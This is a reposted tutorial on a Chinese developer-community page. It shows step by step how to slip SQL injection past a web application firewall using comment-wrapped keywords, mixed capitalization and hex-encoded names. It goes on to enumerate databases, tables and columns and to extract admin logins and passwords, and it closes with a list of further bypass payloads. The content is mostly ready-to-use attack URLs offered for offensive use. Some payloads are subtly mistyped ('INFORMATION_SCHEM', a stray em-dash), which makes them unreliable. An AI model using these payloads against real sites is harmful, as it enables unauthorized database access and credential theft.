开发者社区> 技术小美> 正文

SQL Injection [ Bypassing WAF (403 Forbidden) ]

简介:
+关注继续查看
OK, so this tutorial will teach you how to SQL Inject to bypass WAF (Web Application Firewall).

Lets start.

http://www.site.com/index.php?id=1 (No Errors!!)
http://www.site.com/index.php?id=1’’ (Error!!)
http://www.site.com/index.php?id=1+ORDER+BY+1,2,3,4,5-- (No Errors!!)
http://www.site.com/index.php?id=1+ORDER+BY+1,2,3,4,5,6-- (Error!!!)
http://www.site.com/index.php?id=1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)



Now we will see if we can get one past the WAF system by using some comments to hide the parts of our statement that our most likely being filtered. In basic form it will look like this:

http://www.site.com/index.php?id=1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5-- (403 Forbidden)
http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5-- (No Errors!!)



Now there is no more 403 Forbidden message stopping you and you can see the vulnerable columns displayed on the page. I will use my examples and assume columns 2, 4, & 5 are vulnerable. Now that we have the vulnerable columns we can extract some data, let’s first find some basic info though. We will use CONCAT to grab the current database name, the current user, and the version info, like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,CONCAT%28database%28%29,user%28%29,version%28%29%29,3,4,5-- (403 Forbidden – WTF?)


OK, so now we have commented out our UNION SELECT statement but something is still setting off the filters… it is most likely the CONCAT statement. In some cases it is possible to bypass filters by simply changing the norm up and re-testing. This can be accomplished by comments or by simply changing CaPiTAliZaTIon, like so:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,ConCAt%28database%28%29,user%28%29,version%28%29%29,3,4,5-- (No Errors!!)

Results:
· Version = 5.0.92-community-log
· User = dumbdba@localhost
· Database() = exampleDB



It worked! we now know the current database name, user name and the version as they are neatly displayed on the page for us. These two techniques can be combined to evade filters throughout your Injections as you will see. Now let us try to get the list of all the databases available, instead of just the current one, like so:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT%28SCHEMA_NAME%29,3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA-- (403 Forbidden)



Luckily we know what to do now so start by altering GROUP_CONCAT, same as we did for CONCAT:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28SCHEMA_NAME%29,3,4,5+FROM+INFORMATION_SCHEM.SCHEMATA-- (No Errors!!)

Results:
· Information_Schema
· exampleDB


This should now show us the available databases! Now let us check for the tables tied to the current database.
http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28TABLE_NAME%29,3,4,5+FROM+INFORMATION_SCHEM.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29--
 (403 Forbidden again)

In some cases you may have experienced a 403 in the previous step as well, it is due to the fact that often times INFORMATION_SCHEMA or TABLES will be filtered. Again, this changes from site to site based on how it was configured so it could even be other items but these are the most common. In order to get around the filters we simply need to use our comments method again, so it looks like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28TABLE_NAME%29,3,4,5+FROM+/*!INFORMATION_SCHEM*/.TABLES-- (No Errors!!)

TABLES FOUND: Admin, News, Ads, Users

Now we have all of the tables for the current database displayed on the page without any 403 holding us back. We can get columns using the same method as we used in the Basic SQLi 101 examples but we will keep our comments and capitalization techniques alive so it gets past the WAF (reminder to also HEX your table names).

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28COLUMN_NAME%29,3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e-- (No Errors!!)

The page will now display a list of the columns from the Admin table in the vulnerable column 2 spot on page. In this example we will assume we found the following column names:
· id
· login
· password
· email

OK, now it we know the tables and associated columns. It is time to get some data extracted, like this:

http://www.site.com/index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT%28id,0x3a,login,0x3a,password,0x3a,email,0x3a%29,3,4,5+FROM+Admin%E2%80%94


Alright, you have successfully gotten past a WAF system! Enjoy!

EXTRA EXAMPLES:
Admins will filter all kinds of things, like words (UNION, SELECT, LIKE) and symbols (=, !=, ‘) so here is some additional examples to help get you on your way:

Using the comments to break up the possible standard versions that would be used and therefore possible filtered.
· /**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
- union select column from table
· /*!union*/+/*!select*/+1,2,3—
- Union select 1,2,3
· /*!UnIOn*//*!SeLect*/+1,2,3—
- Union select 1,2,3
· un/**/ion+sel/**/ect+1,2,3—
- Union select 1,2,3
· /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
- Union select 1,2,3
· Query within query (stacked query) and both methods in use:
- ID=66+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,(SELECT+conca t(0x3a,id,0x3a,password,0x3a)+FROM+information_sch ema.columns+WHERE+table_schema=0x6334706F645F66657 3746976616C5F636D73+AND+table_name=0x7573657273),9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30--

If you can’t use the WHERE function, try replacing with some form of the LIMIT function:
· LIMIT 0,1
- note that 0,1 gets 1 result starting from the 0th row (first entry)
- to view the second table, we change limit 0,1 to limit 1,1

If you can’t use the “=” sign try using the not equal to sign “!=” instead to see if you can use this to find other items based on any base you have found. i.e. If you know the current DB, you could then check for !=databse() to possibly find alternative databases (or tables or columns) in your request statement

If you can use one, you might be able to try another:
· If substring() is being filtered you can also use mid() OR substr() to get similar results
- select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
· If ascii() is being filtered you can also use hex() OR bin() to get similar results
· If you can’t use benchmark() you might also try sleep()
· 0x3a can be used to replace a colon ':' as it is the HEX value
- Helpful in separating results
- i.e. group_concat(user,0x3a,fd_Password) = user:fd_Password
· 0x0a can be used to create new line for results to be displayed easier

I like to start when doing my vulnerability checks to see how the system is filtering things. If you try using double quotes, single quotes, pound symbols, comments, etc all to both see if they trigger any errors indicating the site is vulnerable but also to take note of the methods being used to filter input.
· ‘ becomes “’ or */, play with things and take mental notes and you will see patterns over time, same is true of errors when UNION is missing or CONCAT it is another clue of what is going on the other side
- I have not found a complete list but would like to have one for reference of which filters indicate what type of WAF/IDS is in use, so if anyone has something please message me or send my way so I can make an update to include

The point here is to get creative as it typically only filters what the admin configures and they still need to allow for legitimate use of some items so there will always be options it is just making them work for you. Enjoy!
















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/744023,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
如何设置阿里云服务器安全组?阿里云安全组规则详细解说
阿里云安全组设置详细图文教程(收藏起来) 阿里云服务器安全组设置规则分享,阿里云服务器安全组如何放行端口设置教程。阿里云会要求客户设置安全组,如果不设置,阿里云会指定默认的安全组。那么,这个安全组是什么呢?顾名思义,就是为了服务器安全设置的。安全组其实就是一个虚拟的防火墙,可以让用户从端口、IP的维度来筛选对应服务器的访问者,从而形成一个云上的安全域。
18847 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
28044 0
阿里云服务器安全组设置内网互通的方法
虽然0.0.0.0/0使用非常方便,但是发现很多同学使用它来做内网互通,这是有安全风险的,实例有可能会在经典网络被内网IP访问到。下面介绍一下四种安全的内网互联设置方法。 购买前请先:领取阿里云幸运券,有很多优惠,可到下文中领取。
22074 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
20131 0
阿里云服务器ECS登录用户名是什么?系统不同默认账号也不同
阿里云服务器Windows系统默认用户名administrator,Linux镜像服务器用户名root
15532 0
腾讯云服务器 设置ngxin + fastdfs +tomcat 开机自启动
在tomcat中新建一个可以启动的 .sh 脚本文件 /usr/local/tomcat7/bin/ export JAVA_HOME=/usr/local/java/jdk7 export PATH=$JAVA_HOME/bin/:$PATH export CLASSPATH=.
14869 0
使用OpenApi弹性释放和设置云服务器ECS释放
云服务器ECS的一个重要特性就是按需创建资源。您可以在业务高峰期按需弹性的自定义规则进行资源创建,在完成业务计算的时候释放资源。本篇将提供几个Tips帮助您更加容易和自动化的完成云服务器的释放和弹性设置。
20883 0
+关注
6819
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
JS零基础入门教程(上册)
立即下载
性能优化方法论
立即下载
手把手学习日志服务SLS,云启实验室实战指南
立即下载